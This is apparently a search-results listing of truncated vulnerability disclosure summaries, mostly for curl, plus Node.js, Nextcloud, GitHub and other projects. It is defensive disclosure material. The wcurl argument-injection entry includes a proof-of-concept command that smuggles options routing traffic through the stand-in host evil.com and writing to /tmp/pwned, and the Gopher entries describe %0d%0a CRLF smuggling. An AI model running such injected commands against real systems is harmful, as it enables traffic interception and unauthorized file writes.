15369 matches found
Monero: Inverted ternary in peerlist_manager::filter() allows unlimited whitelist entries per host via different ports
The peerlistmanager::filter function in the Monero project's p2p/netpeerlist.h file contained an incorrect ternary operator that operated on the wrong peer list. When called with 'white=true', it filtered the gray list instead of the white list. As a result, a single host could accumulate unlimit...
Node.js: Assertion error in node_url.cc via malformed URL format leads to Node.js crash
An assertion error in nodeurl.cc via malformed URL format leads to a Node.js crash. A flaw in the URL processing caused an assertion failure in the native code when url.format was called with a malformed internationalized domain name containing invalid characters, crashing the Node.js process. Th...
Basecamp: Improper Access Control in `fizzy.do` import flow allows cross-tenant ActionText reference resolution and data disclosure
The vulnerability allowed for cross-tenant ActionText reference resolution and data disclosure during the account import flow. The import process did not properly verify the ownership of the referenced records before minting signed global IDs, enabling an attacker to access and disclose data from...
RubyGems: Server-side ReDoS via user-controlled regex in OIDC Access Policy
The OIDC Access Policy implementation evaluated user-supplied regular expressions against JWT claim values using Ruby's Regexp engine without any timeout or complexity validation. The vulnerable code path was Regexp.newvalue.match?claimvalue, where value was fully user-controlled and claimvalue w...
Node.js: Timing side-channel in HMAC verification via memcmp() in crypto_hmac.cc leads to potential MAC forgery
Vulnerability description not provided...
Node.js: Memory leak in Node.js HTTP/2 server via WINDOW_UPDATE on stream 0 leads to resource exhaustion
Vulnerability description not provided...
curl: MQTT Protocol Packet Injection via Unchecked CONNACK Remaining Length
I'm not sure if this is a vulnerability or intended behavior, but I noticed that curl MQTT implementation accepts CONNACK packets with Remaining Length values greater than 2, which appears to violate the MQTT v3.1.1 specification. According to the MQTT spec, CONNACK packets should have a Remainin...
GitHub: Add labels to arbitrary issues/prs & compromise github actions label checks
A vulnerability was identified that allowed a user with read access to a repository and write access to a project to modify issue and pull request metadata through the project. When adding an item to a project that already existed, column value updates were applied without verifying the actor's...
Fastify: DoS via Unbounded Memory Allocation in sendWebStream on Fastify v5.7.0+ leads to OOM crash when backpressure is ignored
A vulnerability was discovered in Fastify versions 5.7.0 and later. The issue was in the "sendWebStream" function, which failed to handle TCP backpressure correctly. When a ReadableStream was sent as a response, Fastify continuously pulled data from the stream producer and wrote it to the respons...
curl: wcurl Argument Injection via Unquoted Variable
when i was code auditing curl i stumbled uppon a vulnerablity that was on wcurl affected version:current step 1: open terminal step 2:run pocs below wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt wcurl --dry-run --curl-options='-o...
Tucows (VDP): Password Strength Policy Bypass via Server-Side Validation Flaw
A password strength policy bypass was discovered due to a server-side validation flaw. The password strength policy was only enforced in the browser, not on the server side...
curl: Integer Underflow in src/var.c
Summary: A potential Integer Underflow vulnerability was identified in the setvariable function within src/var.c. the flaw occurs during the calculation of the variable content length clen when a byte range is specified. specifically, the code fails to validate if startoffset is greater than...
GitHub: PATs without the required scope can leak issues
An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token PAT lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...
Nextcloud: View-only guests could see deleted Collectives pages in the trashbin
A vulnerability was discovered where view-only guests could see deleted Collectives pages in the trashbin...
Nextcloud: IDOR on ██████ via direct photo URL leads to unauthorized access to deleted and other users' photos
Summary: An Insecure Direct Object Reference IDOR vulnerability exists in the application that allows unauthorized access to photos belonging to other users. The application does not properly validate whether the logged-in user is authorized to access a photo when accessing it via direct URL. Thi...
Weblate: Argument Injection in /manage/ssh/ via host parameter leads to sensitive file disclosure on Weblate
A vulnerability was discovered in the SSH management interface of Weblate, a web-based translation tool. The vulnerability allowed an attacker with administrative privileges to inject command-line arguments into the host parameter, leading to sensitive file disclosure on the server. The vulnerabl...
curl: SSL options ISSUERCERT, EC_CURVES and CRLFILE silently ignored by non-OpenSSL backends
Summary: The SSL options ISSUERCERT, ECCURVES and CRLFILE are silently ignored for e.g. the mbedTLS backend, which allows MITM attacks for the ISSUERCERT and CRLFILE bug, and can reduce the security and compliance by ignoring the specified curve for the ECCURVES bug. Affected version Tested with...
curl: Cross‑origin cookies leak and injection risk when using a custom Host header
Summary When a custom hostname is specified, it is used for cookie matching if the cookie engine is also enabled for this transfer. This matching persists in cross-origin redirects despite that the originally supplied hostname is removed. cookiehost is set from a custom Host header: lib/http.c...
curl: Cookie Replacement Use-After-Free Vulnerability
Summary: The cookie replacement logic in lib/cookie.c contains a use-after-free vulnerability in the replaceexisting function. The function modifies a linked list while iterating over it, creating potential for memory corruption in concurrent or complex cookie operations. Vulnerable Code Location...
curl: Cookie Max-Age Integer Overflow Vulnerability
Summary: The cookie parsing code in lib/cookie.c contains an integer overflow vulnerability when processing the Max-Age attribute of HTTP cookies. The vulnerable code attempts to add the max-age value to the current timestamp without adequate overflow protection While the code includes an overflo...
Sony: Improper State Validation on Sony WH-CH520 via BLE Command Service leads to unauthorized Bluetooth pairing and audio hijacking
A vulnerability was discovered in the firmware of the Sony WH-CH520 headset. The vulnerability allowed an unauthenticated write to a proprietary Sony command service via Bluetooth Low Energy BLE, causing the device to become discoverable and accept a standard Bluetooth Security Manager Protocol S...
curl: libcurl: Improper Authentication State Management on Cross-Protocol Redirects
Following the recent advisory for CVE-2025-14524, I conducted an investigation into how libcurl manages OAuth2 credentials during complex redirect chains. I have confirmed that while the library successfully protects traditional user credentials, it fails to clear OAuth2 Bearer tokens in the same...
AWS VDP: Password Reuse Vulnerability on AWS Sign-in Page via Password Reset Flow leads to Security Policy Violation
Asset URL: ██████ Summary: The AWS sign-in page allows users to reuse old passwords when resetting their password, which violates security best practices outlined in OWASP Authentication Cheat Sheet and NIST 800-63B Digital Identity Guidelines. This misconfiguration could potentially weaken accou...
Nextcloud: Private circle can be added to another circle via API despite visibility restriction
A vulnerability was discovered where private circles could be added to other circles via the API, despite visibility restrictions...
Node.js: HashDoS in V8
Vulnerability description not provided...
Cosmos: Memory Exhaustion in CometBFT v1.0.1 via malicious ProposalMessage leads to network-wide denial of service
Summary of Impact CometBFT v1.0.1 contains a critical memory exhaustion vulnerability that allows any peer to crash nodes with a single 50-byte P2P message. An attacker can send a malicious ProposalMessage with PartSetHeader.Total set to 2^32-1, causing the receiving node to immediately allocate...
GoCD: Information Disclosure via Logback Configuration Injection in GoCD Agent
Summary The GoCD Agent's logging mechanism Logback allows for property substitution and custom configuration loading. By default, the config directory might not exist in the installation path. However, if an attacker creates this directory and places a specially crafted agent-launcher-logback.xml...
curl: Directory listing vulnerability is disclosing names and emails, widespread (thousands of records, publicly accessible without auth)
Summary: directory listing vulnerability is disclosing names and emails and so many other sensitive information, that significantly increases the severity because these are considered as PII Personally Identifiable Information. Thousands of records, publicly accessible without auth also can be...
curl: IMAP Protocol Desynchronization and Response Smuggling via Naive Literal Parsing
libcurl incorrectly parses IMAP literals size even when they are embedded within quoted strings e.g., email subjects or headers. This behavior violates RFC 3501, which mandates that content inside double quotes must be treated as opaque text. This parsing error causes the client state machine to...
curl: MQTT: unsigned integer underflow bypasses MAX_MQTT_MESSAGE_SIZE check
Summary An unsigned integer underflow exists in libcurl's MQTT publish path. Due to incorrect arithmetic ordering in the size validation logic, oversized MQTT PUBLISH messages are not rejected as intended. Affected version libcurl 8.18.0 Tested on macOS arm64 with AddressSanitizer enabled. Steps ...
curl: Digest Authentication Header Injection
Summary The Digest authentication implementation in libcurl fails to properly escape the uri parameter in the Authorization header. While other parameters like username, realm, and nonce are correctly escaped using authdigeststringquoted, the uri is inserted raw into the header. This allows an...
curl: Gopher Protocol Command Injection (SSRF Smuggling)
Summary The curl Gopher protocol handler is vulnerable to command injection through URL-encoded CRLF sequences in the path. This allows an attacker to "smuggle" additional Gopher selectors or arbitrary commands into a single Gopher request. By using %0d%0a in the URL, an attacker can break the...
curl: Use-After-Free in curl_easy_nextheader when reusing header handle across requests
. The API returns struct curlheader objects that internally reference libcurl-owned linked list nodes. When a new request is performed on the same CURL handle, libcurl frees and rebuilds the internal header list, but previously returned struct curlheader objects remain valid to the application an...
curl: integer Overflow in MQTT Protocol Handling Allows Bypassing Message Size Limit
Summary: A logic error involving an integer overflow specifically, an unsigned integer underflow exists in the lib/mqtt.c file within the mqttpublish function. This vulnerability allows an attacker or a malicious user configuration to bypass the explicit MAXMQTTMESSAGESIZE check. The vulnerabilit...
curl: Integer-underflow leads to heap over-read in TFTP implementation
libcurl on commit 3ee1d3b573e6ea36fb478dbd0d9913483b900928 contains a vulnerability in its TFTP implementation that can cause curl or a libcurl-user to send heap memory beyond the bounds of an allocated chunk to a malicious TFTP server. The vulnerability lies in lib/tftp.c, in function...
MetaMask: Authorization Bypass in Starknet Snap via enableAuthorize parameter leads to unauthorized transaction signing
A critical security vulnerability was discovered in the Starknet Snap by Consensys. The vulnerability allowed malicious websites to bypass user authorization when signing messages or transactions. The vulnerability existed in the enableAuthorize parameter, which could be controlled by any website...
GitHub: Missing Access Control in MigrationFile allows attacker to upload files to any Migration
A Missing Authorization vulnerability was identified in GitHub Enterprise Server that allowed unauthorized content to be uploaded to a user's repository migration export due to a missing authorization check in the repository migration upload endpoint. The vulnerability could be exploited by...
curl: Heap Out-of-Bounds Read in lib/http2.c via Malformed PUSH_PROMISE Headers
Summary A heap-based out-of-bounds read vulnerability exists in libcurl's HTTP/2 implementation. The onheader callback in lib/http2.c incorrectly treats header names and values provided by nghttp2 as null-terminated C-strings. Specifically, passing these pointers to curlmaprintf with the %s forma...
curl: CRLF Injection in HTTP header values allows arbitrary header injection
curl allows carriage return \r and line feed \n characters inside HTTP header values. When attacker-controlled data is used in a header value e.g., Authorization: Bearer , curl construct and sends a malformed HTTP request containing injected headers. This violates HTTP specification RFC 7320 /RFC...
curl: inconsistently Rejection Logic in file:// URLs with Authority
curl's file:// protocol handler inconsistently applies path sanitization. in reject file://../ as Bad File:// URL" but allows the same traversal when an authority/host e.g.,localhost is present file://localhost/../. this inconsistency misleads developers who rely on the bad file:// URL error for...
curl: Stack Buffer Overflow in mprintf.c formatting function (fallback path)
Summary A stack-based buffer overflow exists in mprintf.c within the outdouble function. This vulnerability affects builds where HAVESNPRINTF is undefined, forcing the use of the legacy sprintf function. The logic responsible for calculating the maximum safe precision maxprec for floating-point...
Nextcloud: Authentication Bypass in ID4me handling via Missing JWT Signature Verification in User OIDC
An authentication bypass vulnerability was discovered in the ID4me handling in the OIDC implementation. The vulnerability was caused by missing JWT signature verification for user authentication...
curl: MQTT: Missing upper bound on incoming Remaining Length allows server-controlled long wait
Curl's MQTT implementation accepts any valid Remaining Length advertised by the server without an explicit upper bound beyond the MQTT spec maximum of 268,435,455 bytes. A malicious server can send a PUBLISH packet claiming this maximum size but provide only minimal payload, causing curl to wait...
curl: State Isolation Failure in Multiplexed Connections (Shared Auth Context)
Vulnerability: State Isolation Failure in Multiplexed Connections Shared Auth Context Product: libcurl Affected Versions: v7.43.0 - Current v8.x - All versions supporting HTTP/2 Multiplexing Severity: CRITICAL CVSS: 9.1 1. Executive Summary A fundamental design flaw exists in libcurl's state...
Nextcloud: SVG filter primitives bypass remote image blocking, enabling email tracking without consent.
A vulnerability was discovered in the HTML sanitizer of the Roundcube webmail application. The sanitizer did not properly handle the SVG filter primitive, allowing external resources to be loaded even when the "Block remote images" setting was enabled. This vulnerability could be used to track...
curl: Path Traversal in curl file:// Protocol Handler Allows Unauthorized File Access
Summary During my manual review of the file path handling logic in curl's source code, I noticed the absence of proper validation for directory traversal sequences, which I then verified through practical testing. I discovered that curl allows unauthorized access to arbitrary files through the...
curl: Alt-Svc bypasses credential leak protection (CVE-2018-1000007)
Summary I found a bug where curl's Alt-Svc implementation fails to strip sensitive authentication headers Authorization and Cookies when remapping a connection to a different host or port. This essentially bypasses the security fix for CVE-2018-1000007. While auditing the code, I noticed that...
8x8: jitsi-call-analytics: Unauthenticated arbitrary file write via path traversal in `/api/v1/uploads/analyze`
A path traversal vulnerability was discovered in the /api/v1/uploads/analyze endpoint of the jitsi-call-analytics backend. The vulnerability allowed unauthenticated users to write files within the configured RTCSTATSDOWNLOADSPATH directory. The issue was caused by the upload handler using...
curl: CRLF Injection in Gopher Protocol (`lib/gopher.c`)
Control characters slip through during URL handling in curl’s Gopher setup. Though null bytes get blocked by the REJECTZERO setting, returns and line feeds remain permitted. A specially built address using percent-encoded breaks - like %0D%0A - opens room for command insertion. Because of how...
curl: HTTP Request Smuggling and SSRF via CRLF Injection in Curl_add_custom_headers
Summary: A lack of CRLF validation in Curladdcustomheaders at lib/http.c:1761 allows users to inject arbitrary HTTP headers. This violation of RFC 7230 §3.2.4 leads to HTTP Request Smuggling and potential SSRF bypass. AI Disclosure: I utilized an AI assistant to aid in the initial code analysis a...